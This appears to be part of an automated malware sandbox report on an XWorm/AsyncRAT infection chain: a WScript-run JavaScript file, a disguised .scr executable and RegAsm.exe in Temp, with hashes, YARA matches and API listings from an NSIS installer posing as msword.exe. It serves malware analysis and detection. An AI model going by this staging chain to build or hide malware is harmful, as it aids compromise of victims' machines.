Start time:	03:49:02
Start date:	10/12/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
Imagebase:	0x7ff6075f0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	03:49:02
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
Imagebase:	0x220000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	03:50:53
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
Imagebase:	0x680000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000023.00000002.4498694614.0000000000762000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000023.00000002.4498694614.0000000000762000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000023.00000002.4500241219.00000000029BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000023.00000002.4500241219.0000000002971000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Function 061E0F7F Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2141456841.00000000061E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_61e0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdcdf4f5b538d7bb9e3b9453bdd95530608f5813ccce421a7ac41bc9376e01ce
Instruction ID: 829abc80aa2e61d12fd1152778b15deaf6d7d79f02ac159799c52b067e00e0fc
Opcode Fuzzy Hash: cdcdf4f5b538d7bb9e3b9453bdd95530608f5813ccce421a7ac41bc9376e01ce
Instruction Fuzzy Hash:

Function 061E0F8F Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2141456841.00000000061E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_61e0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdcdf4f5b538d7bb9e3b9453bdd95530608f5813ccce421a7ac41bc9376e01ce
Instruction ID: 829abc80aa2e61d12fd1152778b15deaf6d7d79f02ac159799c52b067e00e0fc
Opcode Fuzzy Hash: cdcdf4f5b538d7bb9e3b9453bdd95530608f5813ccce421a7ac41bc9376e01ce
Instruction Fuzzy Hash:

Function 061E0F87 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2141456841.00000000061E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_61e0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdcdf4f5b538d7bb9e3b9453bdd95530608f5813ccce421a7ac41bc9376e01ce
Instruction ID: 829abc80aa2e61d12fd1152778b15deaf6d7d79f02ac159799c52b067e00e0fc
Opcode Fuzzy Hash: cdcdf4f5b538d7bb9e3b9453bdd95530608f5813ccce421a7ac41bc9376e01ce
Instruction Fuzzy Hash:

Function 061E0FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2141456841.00000000061E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_61e0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdcdf4f5b538d7bb9e3b9453bdd95530608f5813ccce421a7ac41bc9376e01ce
Instruction ID: 829abc80aa2e61d12fd1152778b15deaf6d7d79f02ac159799c52b067e00e0fc
Opcode Fuzzy Hash: cdcdf4f5b538d7bb9e3b9453bdd95530608f5813ccce421a7ac41bc9376e01ce
Instruction Fuzzy Hash:

Analysis Process: msword.exePID: 6508, Parent PID: 2716COMMON

Execution Graph

Execution Coverage:	17.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.7%
Total number of Nodes:	1526
Total number of Limit Nodes:	34

Executed Functions

Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040512F
GetDlgItem.USER32(?,000003EE), ref: 0040513E
GetClientRect.USER32(?,?), ref: 00405196
GetSystemMetrics.USER32(00000015), ref: 0040519E
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
ShowWindow.USER32(?,00000008), ref: 0040523A
GetDlgItem.USER32(?,000003EC), ref: 0040525B
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
GetDlgItem.USER32(?,000003F8), ref: 0040514D

Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

GetDlgItem.USER32(?,000003EC), ref: 004052AB
CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
CloseHandle.KERNELBASE(00000000), ref: 004052C0
ShowWindow.USER32(00000000), ref: 004052E7
ShowWindow.USER32(?,00000008), ref: 004052EC
ShowWindow.USER32(00000008), ref: 00405333
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
CreatePopupMenu.USER32 ref: 00405376
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
GetWindowRect.USER32(?,?), ref: 0040539E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
OpenClipboard.USER32(00000000), ref: 0040540B
EmptyClipboard.USER32 ref: 00405411
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
GlobalLock.KERNEL32(00000000), ref: 00405427
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
GlobalUnlock.KERNEL32(00000000), ref: 0040545D
SetClipboardData.USER32(0000000D,00000000), ref: 00405468
CloseClipboard.USER32 ref: 0040546E

Strings

{, xrefs: 00405352
@rD, xrefs: 004053D7
New install of "%s" to "%s", xrefs: 00405182

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: @rD$New install of "%s" to "%s"${
API String ID: 2110491804-2409696222
Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038A2
SetErrorMode.KERNELBASE(00008001), ref: 004038AD
OleInitialize.OLE32(00000000), ref: 004038B4

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
CoUninitialize.COMBASE(?), ref: 00403AD1
ExitProcess.KERNEL32 ref: 00403AF1
lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40

Strings

NSIS Error, xrefs: 004038E2
/D=, xrefs: 004039A6
1C, xrefs: 00403B56
\Temp, xrefs: 00403A1B
Error launching installer, xrefs: 00403A7D
~nsu.tmp, xrefs: 00403AF7
SeShutdownPrivilege, xrefs: 00403C16
NCRC, xrefs: 0040397C
_?=, xrefs: 00403A64

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
API String ID: 2435955865-239407132
Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86

Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
GetProcAddress.KERNEL32(00000000), ref: 00406327

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC

Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
FindClose.KERNEL32(00000000), ref: 004062EC

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
ShowWindow.USER32(?), ref: 004054D2
DestroyWindow.USER32 ref: 004054E6
SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
GetDlgItem.USER32(?,?), ref: 00405523
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
IsWindowEnabled.USER32(00000000), ref: 0040553E
GetDlgItem.USER32(?,00000001), ref: 004055ED
GetDlgItem.USER32(?,00000002), ref: 004055F7
SetClassLongW.USER32(?,000000F2,?), ref: 00405611
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
GetDlgItem.USER32(?,00000003), ref: 00405708
ShowWindow.USER32(00000000,?), ref: 0040572A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
EnableWindow.USER32(?,?), ref: 00405757
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
EnableMenuItem.USER32(00000000), ref: 00405774
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
SetWindowTextW.USER32(?,00447240), ref: 004057DC
ShowWindow.USER32(?,0000000A), ref: 00405910

Strings

@rD, xrefs: 004057B9

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: @rD
API String ID: 3282139019-3814967855
Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

SetFileAttributes failed., xrefs: 004017A1
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
detailprint: %s, xrefs: 00401679
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
Call: %d, xrefs: 0040165A
Sleep(%d), xrefs: 0040169D
SetFileAttributes: "%s":%08X, xrefs: 0040177B
Rename failed: %s, xrefs: 0040194B
Jump: %d, xrefs: 00401602
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
Rename: %s, xrefs: 004018F8
CreateDirectory: "%s" created, xrefs: 00401849
Aborting: "%s", xrefs: 0040161D
BringToFront, xrefs: 004016BD
Rename on reboot: %s, xrefs: 00401943
CreateDirectory: "%s" (%d), xrefs: 004017BF
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
RegisterClassW.USER32(0046AD60), ref: 00405B0A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B

Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30

ShowWindow.USER32(00000005,00000000), ref: 00405B91
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
RegisterClassW.USER32(0046AD60), ref: 00405BD3
DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2

Strings

@rD, xrefs: 00405965
_Nb, xrefs: 00405AD1
RichEdit, xrefs: 00405BC4
RichEd20, xrefs: 00405B9D
.DEFAULT\Control Panel\International, xrefs: 00405999
.exe, xrefs: 00405A3D
RichEd32, xrefs: 00405BA8
@%F, xrefs: 004059F6
RichEdit20A, xrefs: 00405BB6, 00405BBB
Control Panel\Desktop\ResourceLocale, xrefs: 00405972
B%F, xrefs: 00405A1F

Memory Dump Source

Source File: 0000000E.00000002.2611943851.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2611921346.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612013915.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.2612110278.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_msword.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-1650083594
